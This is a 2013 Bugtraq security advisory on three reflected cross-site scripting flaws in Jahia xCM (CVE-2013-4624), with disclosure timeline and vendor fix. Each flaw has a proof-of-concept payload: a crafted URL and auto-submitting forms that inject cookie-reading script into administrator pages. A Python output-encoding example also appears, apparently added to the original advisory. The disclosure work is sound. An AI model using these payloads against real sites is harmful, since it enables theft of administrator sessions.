
List:       bugtraq
Subject:    Multiple XSS Vulnerabilities in Jahia xCM
From:       advisory () htbridge ! com
Date:       2013-07-31 10:43:52
Message-ID: 20130731104352.5668B2C4C0CF () htbridge ! ch

Advisory ID: HTB23159
Product: Jahia xCM 
Vendor: Jahia Solutions Group SA 
Vulnerable Version(s): 6.6.1.0 r43343 and probably prior
Tested Version: 6.6.1.0 r43343
Vendor Notification: June 5, 2013 
Vendor Patch: July 17, 2013 
Public Disclosure: July 31, 2013 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2013-4624
Risk Level: Low 
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------


Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple XSS vulnerabilities in Jahia xCM, which can be exploited to perform cross-site scripting attacks against an administrator of the vulnerable application.


1) Multiple Cross-Site Scripting (XSS) Vulnerabilities in Jahia xCM: CVE-2013-4624

1.1 The vulnerability exists due to insufficient sanitisation of user-supplied data in the "site" HTTP GET parameter passed to the "/engines/manager.jsp" script. A remote attacker can trick a logged-in administrator into opening a specially crafted link and execute arbitrary HTML and script code in the administrator's browser in the context of the vulnerable website.

The exploitation example below uses the JavaScript 'alert()' function to display the administrator's cookies:

http://[host]/engines/manager.jsp?conf=repositoryexplorer&site=%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E



1.2 The vulnerability exists due to insufficient filtration of user-supplied data in the "searchString" HTTP POST parameter passed to the "/administration/" URI when "do=users" and "sub=search". A remote attacker can trick a logged-in administrator into opening a specially crafted link and execute arbitrary HTML and script code in the administrator's browser in the context of the vulnerable website.

The exploitation example below uses the JavaScript 'alert()' function to display the administrator's cookies:


<form action="http://[host]/administration/?do=users&sub=search" method="post" name="main">
<input type="hidden" name="searchString" value="'><script>alert(document.cookie);</script>">
<input type="submit" id="btn">
</form>
<script>
document.main.submit();
</script>



1.3 The vulnerability exists due to insufficient sanitisation of user-supplied data in the "username", "manage-user-property#j:firstName", "manage-user-property#j:lastName", "manage-user-property#j:email" and "manage-user-property#j:organization" HTTP POST parameters passed to the "/administration/" URI when "do=users" and "sub=processCreate". A remote attacker can trick a logged-in administrator into opening a specially crafted link and execute arbitrary HTML and script code in the administrator's browser in the context of the vulnerable website.

The exploitation example below uses the JavaScript 'alert()' function to display the administrator's cookies:


<form action="http://[host]/administration/?do=users&sub=processCreate" method="post" name="main">
<input type="hidden" name="username" value="'><script>alert(document.cookie);</script>">
<input type="hidden" name="manage-user-property#j:firstName" value="'><script>alert(document.cookie);</script>">
<input type="hidden" name="manage-user-property#j:lastName" value="'><script>alert(document.cookie);</script>">
<input type="hidden" name="manage-user-property#j:email" value="'><script>alert(document.cookie);</script>">
<input type="hidden" name="manage-user-property#j:organization" value="'><script>alert(document.cookie);</script>">
<input type="hidden" name="actionType" value='save'>
<input type="submit" id="btn">
</form>
<script>
document.main.submit();
</script>
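The root cause shared by 1.1, 1.2 and 1.3 is reflecting a parameter into HTML without encoding for the context it lands in. The payload shapes tell which context each one is: the "site" payload opens with "</script>", so it is reflected inside a script block, while the administration-form payloads open with "'>", so they are reflected inside a single-quoted attribute. The following is an added illustration, not Jahia code: the two reflection contexts are hypothetical templates chosen to match those payload shapes, and the functions show context-specific encoding that neutralises both payloads without losing the value.

```python
import html
import json

# Constructed inputs with the same shapes as the advisory's two payload families.
SCRIPT_CONTEXT_PAYLOAD = "</script><script>alert(document.cookie);</script>"
ATTRIBUTE_CONTEXT_PAYLOAD = "'><script>alert(document.cookie);</script>"


def escape_for_js_string(value: str) -> str:
    """Encode a value for a JavaScript string literal inside a <script> block.
    json.dumps handles quotes, backslashes and control characters; '<', '>' and
    '&' are additionally written as \\uXXXX escapes so that the HTML parser,
    which does not decode entities inside <script>, can never see '</script>'."""
    encoded = json.dumps(value)
    return (encoded.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("&", "\\u0026"))


def escape_for_attribute(value: str) -> str:
    """Encode a value for a quoted HTML attribute; quote=True covers both ' and "."""
    return html.escape(value, quote=True)


def render_manager_page(site: str) -> str:
    """Hypothetical page reflecting 'site' into a script block (assumed context)."""
    return "<script>var site = " + escape_for_js_string(site) + ";</script>"


def render_search_form(search_string: str) -> str:
    """Hypothetical form reflecting 'searchString' into a single-quoted attribute
    (assumed context). The URL's '&' is entity-encoded as attribute text too."""
    return ("<form action='/administration/?do=users&amp;sub=search' method='post'>"
            "<input type='text' name='searchString' value='"
            + escape_for_attribute(search_string) + "'></form>")


def script_tag_count(page: str) -> int:
    """Number of <script tags the HTML parser would open: the manager template
    contributes exactly one, the form template none. Any extra one is a breakout."""
    return page.lower().count("<script")


def decodes_back(value: str) -> bool:
    """The JS-string encoding is lossless: a JSON parser (like the JS engine's
    string literal parsing) recovers the original value unchanged."""
    return json.loads(escape_for_js_string(value)) == value
```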


-----------------------------------------------------------------------------------------------


Solution:

Apply hotfix 7, which is available to all customers:
https://www.jahia.com/fr/home/support/customers-extranet/enterprise-jahia-downloads/jahia-xcm---version-66.html


-----------------------------------------------------------------------------------------------


References:

[1] High-Tech Bridge Advisory HTB23159 - https://www.htbridge.com/advisory/HTB23159 - Multiple XSS Vulnerabilities in Jahia xCM.
[2] Jahia xCM - http://www.jahia.com - Jahia xCM is the unified interface to access, personalize and manage best of breed WCM, portal and document management features.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

-----------------------------------------------------------------------------------------------


Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

